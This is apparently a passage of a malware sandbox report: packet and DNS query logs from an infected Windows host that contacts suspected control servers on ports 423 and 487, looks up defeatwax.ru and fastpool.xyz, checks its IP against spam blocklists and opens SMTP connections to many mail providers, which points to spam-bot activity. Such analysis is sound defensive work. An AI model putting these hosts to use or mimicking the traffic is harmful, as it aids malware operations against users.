Sep 5, 2021 15:51:01.115824938 CEST	487	50223	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:01.133286953 CEST	487	50223	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:01.137101889 CEST	50223	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:01.137156010 CEST	50223	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:01.141395092 CEST	25	50222	142.250.150.27	192.168.2.4
Sep 5, 2021 15:51:01.182364941 CEST	50220	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:51:01.182754993 CEST	50228	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:51:01.206891060 CEST	25	50215	62.141.42.208	192.168.2.4
Sep 5, 2021 15:51:01.206995964 CEST	50215	25	192.168.2.4	62.141.42.208
Sep 5, 2021 15:51:01.210191011 CEST	487	50223	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:01.210221052 CEST	487	50223	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:01.249757051 CEST	487	50223	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:01.251339912 CEST	423	50228	193.56.146.41	192.168.2.4
Sep 5, 2021 15:51:01.251493931 CEST	50228	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:51:01.254844904 CEST	423	50220	193.56.146.41	192.168.2.4
Sep 5, 2021 15:51:01.254925966 CEST	50220	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:51:01.261178017 CEST	487	50223	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:01.261398077 CEST	50223	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:01.261471987 CEST	50223	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:01.261533976 CEST	50223	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:01.261622906 CEST	50223	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:01.261748075 CEST	50223	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:01.261801004 CEST	50223	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:01.261964083 CEST	50223	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:01.261972904 CEST	50223	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:01.314480066 CEST	25	50222	142.250.150.27	192.168.2.4
Sep 5, 2021 15:51:01.320152998 CEST	423	50228	193.56.146.41	192.168.2.4
Sep 5, 2021 15:51:01.320363998 CEST	50228	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:51:01.334357023 CEST	487	50223	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:01.334395885 CEST	487	50223	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:01.334419966 CEST	487	50223	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:01.334561110 CEST	487	50223	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:01.334590912 CEST	487	50223	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:01.334618092 CEST	487	50223	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:01.334767103 CEST	487	50223	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:01.334852934 CEST	487	50223	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:01.338727951 CEST	50222	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:51:01.356988907 CEST	487	50223	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:01.389627934 CEST	423	50228	193.56.146.41	192.168.2.4
Sep 5, 2021 15:51:01.389802933 CEST	487	50223	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:01.389889956 CEST	50223	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:01.393348932 CEST	25	50222	142.250.150.27	192.168.2.4
Sep 5, 2021 15:51:01.394004107 CEST	25	50222	142.250.150.27	192.168.2.4
Sep 5, 2021 15:51:01.452171087 CEST	50222	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:51:01.488651037 CEST	50223	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:01.561891079 CEST	487	50223	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:01.728198051 CEST	50222	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:51:01.782866001 CEST	25	50222	142.250.150.27	192.168.2.4
Sep 5, 2021 15:51:01.782901049 CEST	25	50222	142.250.150.27	192.168.2.4
Sep 5, 2021 15:51:01.783333063 CEST	25	50222	142.250.150.27	192.168.2.4
Sep 5, 2021 15:51:01.783370018 CEST	25	50222	142.250.150.27	192.168.2.4
Sep 5, 2021 15:51:01.783504963 CEST	25	50222	142.250.150.27	192.168.2.4
Sep 5, 2021 15:51:01.823033094 CEST	50221	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:51:01.823065996 CEST	50224	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:51:01.823066950 CEST	50226	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:51:01.823092937 CEST	50227	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:51:01.823093891 CEST	50225	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:51:01.823595047 CEST	50229	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:51:01.824009895 CEST	50230	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:51:01.824371099 CEST	50231	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:51:01.824752092 CEST	50232	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:51:01.825129986 CEST	50233	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:51:01.848382950 CEST	423	50226	213.227.140.23	192.168.2.4
Sep 5, 2021 15:51:01.848479033 CEST	50226	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:51:01.849870920 CEST	423	50232	213.227.140.23	192.168.2.4
Sep 5, 2021 15:51:01.849965096 CEST	50232	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:51:01.854896069 CEST	423	50227	5.61.37.41	192.168.2.4
Sep 5, 2021 15:51:01.854979038 CEST	50227	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:51:01.855866909 CEST	423	50233	5.61.37.41	192.168.2.4
Sep 5, 2021 15:51:01.855962038 CEST	50233	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:51:01.864641905 CEST	423	50225	95.216.195.92	192.168.2.4
Sep 5, 2021 15:51:01.864758015 CEST	50225	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:51:01.865384102 CEST	423	50231	95.216.195.92	192.168.2.4
Sep 5, 2021 15:51:01.865468979 CEST	50231	423	192.168.2.4	95.216.195.92

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 5, 2021 15:50:06.589219093 CEST	192.168.2.4	8.8.8.8	0x2997	Standard query (0)	microsoft-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:09.307293892 CEST	192.168.2.4	8.8.8.8	0xef59	Standard query (0)	defeatwax.ru	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:12.625149965 CEST	192.168.2.4	8.8.8.8	0xbd41	Standard query (0)	rediffmail.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:12.629246950 CEST	192.168.2.4	8.8.8.8	0x9bb	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:12.681721926 CEST	192.168.2.4	8.8.8.8	0x594a	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:12.701411963 CEST	192.168.2.4	8.8.8.8	0x521b	Standard query (0)	comcast.net	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:12.730843067 CEST	192.168.2.4	8.8.8.8	0x1e12	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:12.738560915 CEST	192.168.2.4	8.8.8.8	0xc6d5	Standard query (0)	mx1.comcast.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:12.744067907 CEST	192.168.2.4	8.8.8.8	0x1fe7	Standard query (0)	freenet.de	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:12.755677938 CEST	192.168.2.4	8.8.8.8	0x51d2	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:12.974836111 CEST	192.168.2.4	8.8.8.8	0x3816	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:12.978235960 CEST	192.168.2.4	8.8.8.8	0x9c74	Standard query (0)	emig.freenet.de	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:12.979094028 CEST	192.168.2.4	8.8.8.8	0x99ae	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:12.980513096 CEST	192.168.2.4	8.8.8.8	0xb75b	Standard query (0)	sydstu.catholic.edu.au	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.021192074 CEST	192.168.2.4	8.8.8.8	0x7566	Standard query (0)	aspmx.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.033272982 CEST	192.168.2.4	8.8.8.8	0xa756	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.037106991 CEST	192.168.2.4	8.8.8.8	0x1843	Standard query (0)	gmail.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.037426949 CEST	192.168.2.4	8.8.8.8	0x8e0c	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.070518017 CEST	192.168.2.4	8.8.8.8	0x7d34	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.073386908 CEST	192.168.2.4	8.8.8.8	0x6b66	Standard query (0)	live.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.082406044 CEST	192.168.2.4	8.8.8.8	0xb1f0	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.101649046 CEST	192.168.2.4	8.8.8.8	0xd9c3	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.120026112 CEST	192.168.2.4	8.8.8.8	0xb607	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.128382921 CEST	192.168.2.4	8.8.8.8	0x266c	Standard query (0)	t-online.de	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.145874023 CEST	192.168.2.4	8.8.8.8	0x3e66	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.163733959 CEST	192.168.2.4	8.20.247.20	0x100	Standard query (0)	41.52.17.84.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 5, 2021 15:50:13.201663017 CEST	192.168.2.4	8.8.8.8	0xd96e	Standard query (0)	mx00.t-online.de	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.205105066 CEST	192.168.2.4	8.8.8.8	0xf1aa	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.207437992 CEST	192.168.2.4	8.8.8.8	0x9027	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.244936943 CEST	192.168.2.4	8.8.8.8	0xa08c	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.331989050 CEST	192.168.2.4	8.8.8.8	0x608e	Standard query (0)	aol.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.340631962 CEST	192.168.2.4	8.8.8.8	0xcb43	Standard query (0)	mx00.t-online.de	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.709851027 CEST	192.168.2.4	8.8.8.8	0x8ba5	Standard query (0)	fastpool.xyz	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.776942015 CEST	192.168.2.4	8.8.8.8	0x68b3	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.779071093 CEST	192.168.2.4	8.8.8.8	0x6dac	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.779124975 CEST	192.168.2.4	8.8.8.8	0x7a0a	Standard query (0)	online.fr	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.779474020 CEST	192.168.2.4	8.8.8.8	0x52e4	Standard query (0)	mx-aol.mail.gm0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.779654026 CEST	192.168.2.4	8.8.8.8	0x3faa	Standard query (0)	41.52.17.84.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 5, 2021 15:50:13.882479906 CEST	192.168.2.4	8.8.8.8	0x1e71	Standard query (0)	mx1.free.fr	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.884375095 CEST	192.168.2.4	8.8.8.8	0xc4d1	Standard query (0)	btinternet.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.924773932 CEST	192.168.2.4	8.8.8.8	0x4ed7	Standard query (0)	mx.lb.btinternet.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.941165924 CEST	192.168.2.4	8.8.8.8	0xbdd3	Standard query (0)	controlling.cz	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:14.017913103 CEST	192.168.2.4	8.8.8.8	0x7240	Standard query (0)	controlling-cz.mail.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:14.019648075 CEST	192.168.2.4	8.8.8.8	0x138b	Standard query (0)	op.pl	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:14.232309103 CEST	192.168.2.4	8.8.8.8	0x86f9	Standard query (0)	epicgames.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:14.237004995 CEST	192.168.2.4	8.8.8.8	0x712d	Standard query (0)	mx.poczta.onet.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:14.274478912 CEST	192.168.2.4	8.8.8.8	0x7d4e	Standard query (0)	mxa-003d3601.gslb.pphosted.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:14.377126932 CEST	192.168.2.4	8.8.8.8	0x93a	Standard query (0)	hotmail.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:14.480585098 CEST	192.168.2.4	8.8.8.8	0xca46	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:14.481236935 CEST	192.168.2.4	8.8.8.8	0x6161	Standard query (0)	mx1.comcast.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:14.528300047 CEST	192.168.2.4	8.8.8.8	0xd0b3	Standard query (0)	bacavalley.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:14.741255999 CEST	192.168.2.4	8.8.8.8	0x90da	Standard query (0)	bacavalley.com.mx1.greymail.rcimx.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:14.742450953 CEST	192.168.2.4	8.8.8.8	0xa3d6	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:15.076426983 CEST	192.168.2.4	8.8.8.8	0x2f9	Standard query (0)	mx00.t-online.de	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:15.078166962 CEST	192.168.2.4	8.8.8.8	0xedf6	Standard query (0)	o2.pl	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:15.123233080 CEST	192.168.2.4	8.8.8.8	0xc373	Standard query (0)	mx.tlen.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:15.201909065 CEST	192.168.2.4	8.8.8.8	0xa764	Standard query (0)	online.de	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:15.276565075 CEST	192.168.2.4	8.8.8.8	0x177c	Standard query (0)	mx00.emig.kundenserver.de	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:15.279503107 CEST	192.168.2.4	8.8.8.8	0x58fb	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:15.310261011 CEST	192.168.2.4	8.8.8.8	0x7a89	Standard query (0)	mx00.t-online.de	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:15.550935984 CEST	192.168.2.4	8.8.8.8	0xc781	Standard query (0)	lycos.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:15.624608994 CEST	192.168.2.4	8.8.8.8	0xb11d	Standard query (0)	hanmail.net	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:15.625019073 CEST	192.168.2.4	8.8.8.8	0x1f82	Standard query (0)	mx.lycos.com.cust.b.hostedemail.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:15.872298002 CEST	192.168.2.4	8.8.8.8	0xfdc3	Standard query (0)	mx4.hanmail.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:15.872744083 CEST	192.168.2.4	8.8.8.8	0x6930	Standard query (0)	dbmail.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:15.914956093 CEST	192.168.2.4	8.8.8.8	0x3be5	Standard query (0)	194019900.pamx1.hotmail.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:15.931230068 CEST	192.168.2.4	8.8.8.8	0xbe56	Standard query (0)	baccaro.eu	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:16.154623032 CEST	192.168.2.4	8.8.8.8	0x553c	Standard query (0)	aspmx.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:16.155452967 CEST	192.168.2.4	8.8.8.8	0x5715	Standard query (0)	me.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:16.207055092 CEST	192.168.2.4	8.8.8.8	0x1dce	Standard query (0)	mx01.mail.icloud.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:16.213216066 CEST	192.168.2.4	8.8.8.8	0xf85	Standard query (0)	mx4.hanmail.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:16.782213926 CEST	192.168.2.4	8.8.8.8	0xfb6d	Standard query (0)	gmx.net	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:16.820755005 CEST	192.168.2.4	8.8.8.8	0x4344	Standard query (0)	mx01.emig.gmx.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:16.863373041 CEST	192.168.2.4	8.8.8.8	0xe31d	Standard query (0)	agilysse.fr	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:17.012080908 CEST	192.168.2.4	8.8.8.8	0xff70	Standard query (0)	mx4.mail.ovh.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:17.014030933 CEST	192.168.2.4	8.8.8.8	0xa150	Standard query (0)	mx1.comcast.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:17.086781979 CEST	192.168.2.4	8.8.8.8	0x18c	Standard query (0)	colpal.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:17.146826029 CEST	192.168.2.4	8.8.8.8	0x96a1	Standard query (0)	mailstream-east.mxrecord.io	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:17.509618998 CEST	192.168.2.4	8.8.8.8	0x89e9	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:18.181557894 CEST	192.168.2.4	8.8.8.8	0x8952	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:18.551978111 CEST	192.168.2.4	8.8.8.8	0x1f82	Standard query (0)	yahoo.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:18.592367887 CEST	192.168.2.4	8.8.8.8	0x5d74	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:19.004095078 CEST	192.168.2.4	8.8.8.8	0x36d8	Standard query (0)	seznam.cz	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:19.208100080 CEST	192.168.2.4	8.8.8.8	0x4248	Standard query (0)	mx1.seznam.cz	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:20.090524912 CEST	192.168.2.4	8.8.8.8	0xd7c2	Standard query (0)	www.google.co.cr	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:21.974456072 CEST	192.168.2.4	8.8.8.8	0x907a	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.032160997 CEST	192.168.2.4	8.8.8.8	0x16d9	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.074856997 CEST	192.168.2.4	8.8.8.8	0x40e7	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.121499062 CEST	192.168.2.4	8.8.8.8	0xee72	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.186558962 CEST	192.168.2.4	8.8.8.8	0x569d	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.292081118 CEST	192.168.2.4	8.8.8.8	0xa1ac	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.336196899 CEST	192.168.2.4	8.8.8.8	0xb9bc	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.381215096 CEST	192.168.2.4	8.8.8.8	0xf1a7	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.417603016 CEST	192.168.2.4	8.8.8.8	0x880a	Standard query (0)	mx-aol.mail.gm0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.437721968 CEST	192.168.2.4	8.8.8.8	0xcb4e	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.481282949 CEST	192.168.2.4	8.8.8.8	0xe56b	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.758579016 CEST	192.168.2.4	8.8.8.8	0x50f3	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:23.180459976 CEST	192.168.2.4	8.8.8.8	0x429	Standard query (0)	mx1.comcast.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:23.247178078 CEST	192.168.2.4	8.8.8.8	0xe9ba	Standard query (0)	microsoft-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:23.452775955 CEST	192.168.2.4	8.8.8.8	0x93e2	Standard query (0)	att.net	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:23.498733997 CEST	192.168.2.4	8.8.8.8	0x4fd	Standard query (0)	al-ip4-mx-vip2.prodigy.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:23.801476955 CEST	192.168.2.4	8.8.8.8	0xeba5	Standard query (0)	sigaint.org	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:24.034519911 CEST	192.168.2.4	8.8.8.8	0x6e27	Standard query (0)	in1-smtp.messagingengine.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:25.537318945 CEST	192.168.2.4	8.8.8.8	0x8ca8	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:25.964246988 CEST	192.168.2.4	8.8.8.8	0x6f07	Standard query (0)	medtronic.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:26.289386034 CEST	192.168.2.4	8.8.8.8	0xe88c	Standard query (0)	mxa-00204301.gslb.pphosted.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:26.307336092 CEST	192.168.2.4	8.8.8.8	0xa8f3	Standard query (0)	in1-smtp.messagingengine.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:26.402512074 CEST	192.168.2.4	8.8.8.8	0x248c	Standard query (0)	pgcps.org	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:26.619970083 CEST	192.168.2.4	8.8.8.8	0xff7a	Standard query (0)	ASPMX.L.GOOGLE.COM	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:26.741436958 CEST	192.168.2.4	8.8.8.8	0x836a	Standard query (0)	in1-smtp.messagingengine.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:28.344525099 CEST	192.168.2.4	8.8.8.8	0xefe7	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:28.345736027 CEST	192.168.2.4	8.8.8.8	0x5725	Standard query (0)	minit-europe.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:28.628618002 CEST	192.168.2.4	8.8.8.8	0x9fe0	Standard query (0)	antispam.minit-europe.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:28.631377935 CEST	192.168.2.4	8.8.8.8	0xfbca	Standard query (0)	in1-smtp.messagingengine.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:28.640441895 CEST	192.168.2.4	8.8.8.8	0x8326	Standard query (0)	bellsouth.net	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:28.752897978 CEST	192.168.2.4	8.8.8.8	0xb7e3	Standard query (0)	al-ip4-mx-vip2.prodigy.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:29.308221102 CEST	192.168.2.4	8.8.8.8	0xf81b	Standard query (0)	interia.pl	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:29.582652092 CEST	192.168.2.4	8.8.8.8	0x9c58	Standard query (0)	mx.interia.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:29.583599091 CEST	192.168.2.4	8.8.8.8	0xd79f	Standard query (0)	in1-smtp.messagingengine.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:30.198187113 CEST	192.168.2.4	8.8.8.8	0x9d70	Standard query (0)	hughes-walker.co.uk	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:30.287208080 CEST	192.168.2.4	8.8.8.8	0x3032	Standard query (0)	netscape.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:30.287249088 CEST	192.168.2.4	8.8.8.8	0xf318	Standard query (0)	mx1.privateemail.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:30.333070040 CEST	192.168.2.4	8.8.8.8	0xc83a	Standard query (0)	mx-aol.mail.gm0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:32.543498039 CEST	192.168.2.4	8.8.8.8	0x4c01	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:32.585714102 CEST	192.168.2.4	8.8.8.8	0x12be	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:32.644721031 CEST	192.168.2.4	8.8.8.8	0x2635	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:32.734980106 CEST	192.168.2.4	8.8.8.8	0xc172	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:32.776681900 CEST	192.168.2.4	8.8.8.8	0xf202	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:32.829570055 CEST	192.168.2.4	8.8.8.8	0xf4f7	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:32.886605024 CEST	192.168.2.4	8.8.8.8	0x39eb	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:32.972333908 CEST	192.168.2.4	8.8.8.8	0x175c	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:33.026420116 CEST	192.168.2.4	8.8.8.8	0x956a	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:33.091211081 CEST	192.168.2.4	8.8.8.8	0x96a3	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:34.603647947 CEST	192.168.2.4	8.8.8.8	0x9b46	Standard query (0)	dberney.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:34.674329042 CEST	192.168.2.4	8.8.8.8	0xd2b6	Standard query (0)	microsoft-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:34.683824062 CEST	192.168.2.4	8.8.8.8	0x9659	Standard query (0)	aspmx.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:34.719535112 CEST	192.168.2.4	8.8.8.8	0x9b42	Standard query (0)	dbesing.com	MX (Mail exchange)	IN (0x0001)
